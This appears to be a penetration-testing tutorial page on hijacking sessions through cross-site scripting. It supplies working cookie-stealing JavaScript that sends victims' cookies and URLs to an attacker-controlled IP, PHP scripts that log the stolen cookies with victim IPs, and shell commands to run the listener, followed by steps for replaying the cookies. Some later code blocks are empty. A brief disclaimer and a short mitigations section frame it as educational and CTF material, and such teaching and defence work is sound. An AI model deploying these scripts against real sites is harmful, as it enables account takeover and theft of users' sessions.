> MODULE / XSS HIJACKING

Session Cookie Hijacking

XSS session hijacking is an attack that uses a Cross-Site Scripting vulnerability to steal a victim's session cookie. Once the attacker captures the cookie, they can impersonate the victim by replaying it in authenticated requests — effectively taking over their session without needing credentials.

AUTHORIZED TESTING ONLY. Performing cookie hijacking against systems you do not own or have explicit written permission to test is illegal under computer fraud laws. This documentation is for educational and CTF use only.
OVERVIEW
How It Works
The attack flows in three phases: inject a remote script via XSS → the victim's browser executes the script and sends their cookie to your server → your PHP listener captures and logs the cookie. You then replay the cookie in your browser to hijack the session.
Attacker injects XSS
Victim visits page
Browser loads script.js
script.js sends cookie via GET
index.php logs cookie
Attacker reads cookies.txt
Attacker replays cookie
SESSION HIJACKED
ATTACKER IP
10.200.1.255 (replace with yours)
LISTENER PORT
80 (HTTP)
SERVER SOFTWARE
PHP 7.4+ built-in server
LOG FILE
cookies.txt
STEP 01
Setup script.js — The Cookie Grabber
This JavaScript file runs on the victim's browser when they trigger the XSS. It creates a new Image object with a specially crafted src URL that appends document.cookie as a query parameter. The victim's browser makes a GET request to your server, and the cookie travels in the URL.
JAVASCRIPT script.js 
new Image().src = 'http://10.200.1.255/index.php?c=' + document.cookie
How it works: The Image object's src is set to your server URL with document.cookie appended. The browser immediately attempts to load the image — which triggers an HTTP GET to your server with the cookie in the query string. The server never needs to actually serve an image; it just needs to log the request.
Enhanced version — encodes cookie and includes referrer for context:
JAVASCRIPT script.js (enhanced) 
var img = new Image();
img.src = 'http://10.200.1.255/index.php?c='
  + encodeURIComponent(document.cookie)
  + '&url=' + encodeURIComponent(document.location.href)
  + '&ua=' + encodeURIComponent(navigator.userAgent);
STEP 02
Setup index.php — The Cookie Receiver
This PHP script runs on your server. It listens for GET requests containing the cookie parameter, parses the cookie string, and writes each cookie along with the victim's IP address to a log file called cookies.txt.
PHP index.php 
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file   = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
Code breakdown: The script checks if the 'c' GET parameter exists, explodes the cookie string on semicolons (cookies are semicolon-delimited), URL-decodes each value (since document.cookie may be URL-encoded), then appends each cookie with the victim's IP to cookies.txt using append mode "a+".
Enhanced version — adds timestamp, URL, and User-Agent logging:
PHP index.php (enhanced) 
<?php
if (isset($_GET['c'])) {
    $ip        = $_SERVER['REMOTE_ADDR'];
    $time      = date('Y-m-d H:i:s');
    $url       = isset($_GET['url']) ? urldecode($_GET['url']) : 'unknown';
    $ua        = isset($_GET['ua'])  ? urldecode($_GET['ua'])  : 'unknown';
    $list      = explode(";", urldecode($_GET['c']));

    $file = fopen("cookies.txt", "a+");
    fputs($file, "[{$time}] IP: {$ip} | URL: {$url}\n");
    fputs($file, "UA: {$ua}\n");
    foreach ($list as $cookie) {
        fputs($file, "  Cookie: {$cookie}\n");
    }
    fputs($file, "---\n");
    fclose($file);
}
?>
STEP 03
Start the PHP Listener
Run PHP's built-in development server on port 80. Place both script.js and index.php in the same directory before starting the server. The server will serve script.js to the victim and receive cookie data at index.php.
SHELL terminal 
$ mkdir /tmp/tmpserver && cd /tmp/tmpserver
# Place script.js and index.php here
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
Monitor live requests — tail the cookies file in a second terminal:
SHELL terminal (second window) 
$ tail -f /tmp/tmpserver/cookies.txt
Victim IP: 192.168.1.50 | Cookie: PHPSESSID=abc123def456; user_token=xyz789
STEP 04
Inject the XSS Payload
Inject one of the following payloads into the target's input field, comment box, URL parameter, or any reflected/stored XSS vector. Each payload loads script.js from your server, which the victim's browser will execute.
STEP 05
Use the Stolen Cookie
Once you receive the session cookie in cookies.txt, you can use it to impersonate the victim. Set the cookie in your browser's developer tools or use a tool like curl or Burp Suite to replay authenticated requests.
SHELL curl with stolen cookie
JAVASCRIPT (DevTools Console) Set cookie in browser
Browser extension method: Install EditThisCookie or Cookie-Editor, navigate to the target domain, and manually paste the stolen session cookie. Refresh the page — you should now be authenticated as the victim.
DEFENSE
Mitigations & Protections
HttpOnly FLAG
Set-Cookie: session=...; HttpOnly — prevents document.cookie from reading the cookie in JS.
CSP HEADER
Content-Security-Policy: script-src 'self' — blocks loading scripts from attacker domains.
SAMESITE FLAG
Set-Cookie: session=...; SameSite=Strict — limits cross-site cookie sending.
INPUT SANITIZATION
Escape & validate all user input. Never reflect raw user data into HTML without encoding.
COPIED TO CLIPBOARD